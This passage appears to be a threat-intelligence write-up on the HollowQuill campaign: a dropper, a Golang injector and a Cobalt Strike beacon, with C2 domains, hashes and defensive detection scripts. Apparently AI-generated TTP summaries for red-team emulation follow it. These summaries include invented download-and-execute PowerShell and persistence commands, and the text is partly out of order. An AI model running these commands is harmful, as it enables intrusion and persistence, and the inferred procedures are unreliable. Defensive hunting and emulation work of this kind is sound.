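        hits.append("parent_in_roaming_driver")             # anything spawned from the loader's drop dir
    if image == STAGED_ONEDRIVE and LOADER_DIR in parent:
        hits.append("hollowquill_loader_spawns_onedrive")   # the injection stage itself
    return hits

def scan(events):
    """Return (image, hits) for every event that triggers at least one rule."""
    out = []
    for ev in events:
        hits = classify(ev)
        if hits:
            out.append((ev.image, hits))
    return out

# Constructed sample telemetry: one HollowQuill chain, two benign events.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Public\OneDrive.exe", r"C:\Users\alice\AppData\Roaming\Driver\OneDrives_v2_1.exe"),
    ProcEvent(r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe", r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, "->", ", ".join(hits))
```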

Further analyzing, it becomes quite evident that the beacon is connecting to the C2 server hosted by the attacker using a certain user-agent. As this tool is quite commonly used, we will not delve in depth into the workings of the malicious beacon. The configuration of the beacon can be extracted as follows.

Extracted Configuration:
Method : GET
Host [Command & Control] : phpsympfony.com
User-Agent : "Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"

Hunting and Infrastructure.

Upon analysis of the shellcode injector programmed in Golang, we found some OPSEC-related mistakes by the threat actor, such as leaving the Go build ID inside the injector, which helped us to hunt for similar payloads used by the same threat actor. The Go build ID is as follows:-
_APqjT14Rci2qCv58VO/QN6emhFauHgKzaZvDVYE/3lVOVKh9ePO_EDoV_lSN/NL58izAdTGRId20sd3CJN

Now, looking into the infrastructural artefacts, the malicious command-and-control server, which has been hosted at the domain phpsymfony[.]com, has been rotating across multiple ASN services. Also, there has been a unique HTTP title which has been rotated multiple times across the C2 server.

Phase: Command and Control

  • Technique: Beaconing via HTTP GET Request
  • Procedure: The attacker uses a malicious beacon that connects to the C2 server using a specific user-agent string.
  • User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
  • Configuration Extract: Involves an HTTP GET method connection to phpsympfony.com.

Phase: Execution

  • Technique: Shellcode Injection
  • Procedure: A custom shellcode injector written in Golang is used to facilitate payload execution.

Additional Observations

  • Utilizing Go-build ID helped in identifying and hunting similar injector payloads used by the threat actor.
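One way to pivot on that OPSEC slip, as an added hunting helper that is not the report's or Seqrite's own tooling: it locates the Go build ID marker in a sample's raw bytes and compares the ID against the one quoted above. The sample bytes are constructed, and the known ID is copied exactly as printed in the report.

```python
from typing import Optional

# The Go linker embeds the build ID in the binary as
#   0xFF "Go build ID: \"" <id> "\"\n " 0xFF
# For Windows PE files this marker sits near the start of the text section;
# ELF binaries carry the same ID in a .note.go.buildid note instead.
GO_BUILDID_PREFIX = b'\xff Go build ID: "'
GO_BUILDID_SUFFIX = b'"\n \xff'

# Build ID of the HollowQuill injector, copied as printed in the report above.
HOLLOWQUILL_BUILD_ID = "_APqjT14Rci2qCv58VO/QN6emhFauHgKzaZvDVYE/3lVOVKh9ePO_EDoV_lSN/NL58izAdTGRId20sd3CJN"

def extract_go_build_id(data: bytes) -> Optional[str]:
    """Return the Go build ID found in raw file bytes, or None if absent or truncated."""
    start = data.find(GO_BUILDID_PREFIX)
    if start < 0:
        return None
    start += len(GO_BUILDID_PREFIX)
    end = data.find(GO_BUILDID_SUFFIX, start)
    if end < 0 or end - start > 256:      # a real ID is a few dozen characters
        return None
    return data[start:end].decode("ascii", errors="replace")

def matches_known(data: bytes, known_ids=(HOLLOWQUILL_BUILD_ID,)) -> Optional[str]:
    """Return the known build ID this sample matches, or None."""
    bid = extract_go_build_id(data)
    return bid if bid in known_ids else None

def scan_file(path: str, known_ids=(HOLLOWQUILL_BUILD_ID,)) -> Optional[str]:
    """Convenience wrapper: read a file from disk and check it."""
    with open(path, "rb") as fh:
        return matches_known(fh.read(), known_ids)

# Constructed stand-in for a PE loader: header bytes, padding, then the marker.
SAMPLE_LOADER = (b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 16
                 + GO_BUILDID_PREFIX + HOLLOWQUILL_BUILD_ID.encode() + GO_BUILDID_SUFFIX
                 + b"\xcc" * 16)
# Constructed non-Go file with no marker at all.
SAMPLE_OTHER = b"MZ" + b"\x00" * 64 + b"not a go binary"

if __name__ == "__main__":
    print("loader build ID:", extract_go_build_id(SAMPLE_LOADER))
    print("known match:", matches_known(SAMPLE_LOADER) is not None)
    print("other file:", matches_known(SAMPLE_OTHER))
```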

AS174  United States  COGENT-174
AS47846  Germany  SEDO-AS
AS8560  Unknown  IONOS-AS

Conclusion

We have found that a threat actor is targeting the Baltic Technical University using a research-themed lure, where they have been using a .NET dropper leading to a shellcode loader and finally delivering a Cobalt Strike in-memory implant. Analyzing the overall campaign and the TTPs employed by the threat actor, we can conclude that the threat actor started this targeting a few months back, in December 2024.

SEQRITE Protection.

Trojan.Ghanarava.1738100518c73fdb
Trojan.Ghanarava.1735165667615275

IOCs.

MD5  Filename
ab310ddf9267ed5d613bcc0e52c71a08  Исх 3548 о формировании государственных заданий на проведение фундаментальных и поисковых исследований БГТУ «ВОЕНМЕХ» им. Д.Ф. Устинова.rar
fad1ddfb40a8786c1dd2b50dc9615275  SystemsUpdaters.exe

Phase: Initial Access

  • Technique: Spear-Phishing with File Attachment
  • Procedure: The attacker sends a phishing email with a research-themed lure, including a malicious .NET dropper disguised as a legitimate document.

Phase: Execution

  • Technique: .NET Dropper Execution
  • Procedure: The malicious .NET dropper is executed, leading to the delivery of a shellcode loader.

Phase: Execution

  • Technique: Shellcode Loader
  • Procedure: The shellcode loader is executed to deliver the Cobalt Strike in-memory implant.

Phase: Command and Control

  • Technique: Cobalt Strike Usage
  • Procedure: Once the Cobalt Strike implant is in memory, it establishes a command and control channel for further instructions and actions.

Potential Additional Commands and Tools

These are inferred based on standard TTPs associated with Cobalt Strike:

  • Technique: PowerShell Execution
  • Command: powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('<URL>')

  • Technique: Persistence via Scheduled Task
  • Command: schtasks /create /tn "UpdateTask" /tr "C:\Path\to\malicious.exe" /sc minute /mo 15

  • Technique: Privilege Escalation
  • Procedure: Using built-in Windows tools or Cobalt Strike modules to escalate privileges on the compromised system.

The sequence reflects a typical progression from initial access to establishing a persistent foothold in the targeted environment, leveraging Cobalt Strike’s versatile capabilities.

Looking into the response across the history, we can see that the title "Coming Soon – pariaturzzphy.makebelievercorp[.]com" has been set up multiple times. Upon further searching for the same HTTP title, we found that a lot of hosts are serving the same title, out of which some are serving malicious binaries such as ASyncRAT and much more. Looking into the ASNs, the C2 server has been rotating since the date of activation. The list is as follows.

ASN  Geolocation  Owner
AS13335  United States  Cloudflare Net
AS35916  United States  MULTA-ASN1
AS135377  Hong Kong  UCLOUD-HK-AS-AP UCLOUD INFORMATION TECHNOLOGY HK LIMITED

Based on the provided CTI information, there are no explicit command-line details or specific TTPs directly outlined. However, inferred techniques related to the malware and activity mentioned can be described as follows:

Phase: Command and Control

  • Technique: Use of Remote Access Tools
  • Procedure: Deployment of ASyncRAT for command and control, allowing threat actors to maintain access to compromised systems. This typically involves installing ASyncRAT on target systems to enable remote administration and ongoing communication with rotating C2 servers.

Inferred Activities Based on Known Malware and Methodologies:

Phase: Initial Access

  • Technique: Spear Phishing or Drive-by Download
  • Procedure: Malicious documents or links could initiate the download of ASyncRAT payloads once accessed by the victim.

Phase: Execution

  • Technique: Malware Execution
  • Procedure: Likely involves executing ASyncRAT using methods such as script invocation or exploiting autostart entries to establish persistence.

Phase: Persistence

  • Technique: Registry Run Keys or Scheduled Tasks
  • Command (Inferred): reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "ASyncRAT" /t REG_SZ /d "C:\path\to\async.exe"
  • Alternative Command (Inferred): schtasks /create /tn "ASyncUpdater" /tr "C:\path\to\async.exe" /sc onlogon

Phase: Lateral Movement

  • Technique: Remote Desktop Protocol (RDP) or PsExec for lateral movement (If tools similar to ASyncRAT are used for internal spreading).
  • Procedure (Inferred): Utilize compromised credentials to move laterally across the network.

Phase: Defense Evasion

  • Technique: Obfuscation or Process Hollowing
  • Procedure (Inferred): Use of obfuscation techniques within ASyncRAT to avoid detection by security solutions.

Note: For precise emulation, verify each inferred procedure with current ASyncRAT capabilities and updates since threat tools frequently evolve.

Gemini 2.0

Model: gemini-2.0-flash

Okay, here's the breakdown of the TTPs from the provided CTI report, formatted for red team use.

Operation HollowQuill TTPs

Phase: Initial Access

  • Technique: Phishing via Malicious Document
  • Procedure: The attacker delivers a malicious RAR file via spear-phishing, disguised as a research invitation. The RAR file contains a .NET malware dropper and a decoy PDF.

Phase: Execution

  • Technique: Execution via RAR archive
  • Procedure: After unpacking the RAR Archive.

Phase: Installation

  • Technique: .NET Malware Dropper
  • Procedure: Executes SystemUpdaters.exe. This dropper performs the following actions:

    • Drops a decoy PDF to C:\Users\<User>\AppData\Roaming\Documents\Исх_по_списку_БГТУ_ВОЕНМЕХ.pdf
    • Drops a legitimate version of OneDrive.exe to C:\Users\Public\OneDrive.exe.
    • Drops a Golang shellcode loader, renaming it C:\Users\AppData\Roaming\Driver\OneDrives_v2_1.exe.

Phase: Persistence

  • Technique: Shortcut Creation (Startup Folder)
  • Procedure: The .NET dropper creates a shortcut (X2yL.lnk) in the Windows Startup folder (Environment.SpecialFolder.Startup), using a Microsoft Office icon to masquerade the malicious shortcut. The shortcut's target is set to C:\Users\<User>\AppData\Roaming\Driver\OneDrives_v2_1.exe.

Phase: Defense Evasion and Code Injection

  • Technique: Process Injection (APC Injection)
  • Procedure:
    1. The Golang shellcode loader (OneDrives_v2_1.exe) uses the CreateProcess API in Golang to launch the legitimate OneDrive.exe process in a suspended state.
    2. The shellcode loader decodes a base64 encoded shellcode embedded within it by XOR-ing the base64 result with a key.
    3. The loader allocates memory in the suspended OneDrive.exe process using VirtualAllocEx.
    4. It writes the decrypted shellcode into the allocated memory using WriteProcessMemory.
    5. It injects the shellcode into the process using APC injection by calling QueueUserAPC.
    6. The ResumeThread API is then called to resume execution, triggering the shellcode within the OneDrive.exe process.

Phase: Payload Delivery

  • Technique: In-Memory Execution
  • Procedure: The injected shellcode (Cobalt Strike beacon) executes within the context of the OneDrive.exe process. The shellcode first loads and then zeroes out the .text section of wwanmm.dll by calling DllCanUnloadNow.

Gemini 2.5

Model: gemini-2.5-flash-preview-05-20

Here's a structured breakdown of the threat actor's procedures for red team emulation, based on the provided report:

Phase: Initial Access

  • Technique: Phishing: Spear phishing Attachment (T1566.001)
  • Procedure: The threat actor delivers a malicious RAR archive file, disguised as an official research invitation or state assignment document, to targeted Russian R&D networks.

Phase: Execution

  • Technique: User Execution: Malicious File (T1204.002)
  • Program: .NET Dropper (e.g., SystemsUpdaters.exe, extracted from the initial RAR)
  • Procedure: Upon user execution of the malicious RAR file, a .NET dropper executable is extracted and run.
  • Program: .NET Dropper
  • Procedure: The .NET dropper extracts and drops multiple files from its resources to specific locations:
    • A legitimate OneDrive.exe to C:\Users\Public\OneDrive.exe.
    • A malicious Golang shellcode loader (e.g., OneDrives_v2_1.exe) to C:\Users\Appdata\Roaming\Driver.
    • A decoy PDF document (e.g., Исх_по_списку_БГТУ_ВОЕНМЕХ.pdf) to C:\Users\Appdata\Roaming\Documents.
  • Program: .NET Dropper
  • Procedure: The .NET dropper spawns and displays the extracted decoy PDF document to the user as a lure.
  • Technique: Asynchronous Procedure Call (T1055.004)
  • Program: Golang Shellcode Loader (e.g., OneDrives_v2_1.exe)
  • Procedure: The Golang loader creates a suspended process of the legitimate OneDrive.exe.
  • Program: Golang Shellcode Loader
  • Procedure: The Golang loader decodes and decrypts an embedded Cobalt Strike shellcode using a hardcoded XOR key.
  • Program: Golang Shellcode Loader
  • Procedure: The Golang loader injects the decoded Cobalt Strike shellcode into the suspended OneDrive.exe process's memory using API calls such as VirtualAllocEx, WriteProcessMemory, and QueueUserAPC.
  • Program: Golang Shellcode Loader
  • Procedure: The Golang loader resumes the suspended OneDrive.exe process to execute the injected shellcode within its context.
  • Program: Cobalt Strike Beacon (injected into OneDrive.exe)
  • Procedure: The injected Cobalt Strike beacon loads the wwanmm.dll library.
  • Program: Cobalt Strike Beacon
  • Procedure: The Cobalt Strike beacon zeroes out the .text section of wwanmm.dll for memory preparation.
  • Program: Cobalt Strike Beacon
  • Procedure: The Cobalt Strike beacon uses DllCanUnloadNow to finalize its preparation in memory.

Phase: Persistence

  • Technique: Registry Run Keys / Startup Folder (T1547.001)
  • Program: .NET Dropper
  • Procedure: The .NET dropper creates a shortcut file (e.g., X2yL.lnk) in the user's Windows Startup folder.
    • The shortcut's target path is the malicious Golang loader (e.g., C:\Users\Appdata\Roaming\Driver\OneDrives_v2_1.exe).
    • The shortcut is assigned a Microsoft Office-based icon to appear legitimate.

Phase: Defense Evasion

  • Technique: Masquerading (T1036)
  • Procedure: Malicious files are named to resemble legitimate system or application files (e.g., SystemsUpdaters.exe, OneDrives_v2_1.exe, OneDrive.exe, and the decoy PDF).
  • Procedure: The shortcut file created for persistence uses a legitimate Microsoft Office icon to appear benign.
  • Technique: Embedded Payloads (T1027.009)
  • Procedure: The initial RAR archive contains a .NET dropper, which in turn embeds and drops a Golang loader, a legitimate OneDrive executable, and a decoy PDF, all within its resources.
  • Technique: Time Based Evasion (T1497.003)
  • Program: Golang Shellcode Loader
  • Procedure: The Golang loader performs an anti-analysis check by measuring the sleep duration; it exits if the sleep time is less than 6 seconds.

Phase: Command and Control

  • Technique: Data Encoding: Standard Encoding (T1132.001)
  • Program: Cobalt Strike Beacon
  • Procedure: The Cobalt Strike beacon communicates with its C2 server using standard HTTP/HTTPS protocols.
  • Program: Cobalt Strike Beacon
  • Procedure: The Cobalt Strike beacon uses a user-agent string consistent with a legitimate browser (e.g., Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko) for C2 communications.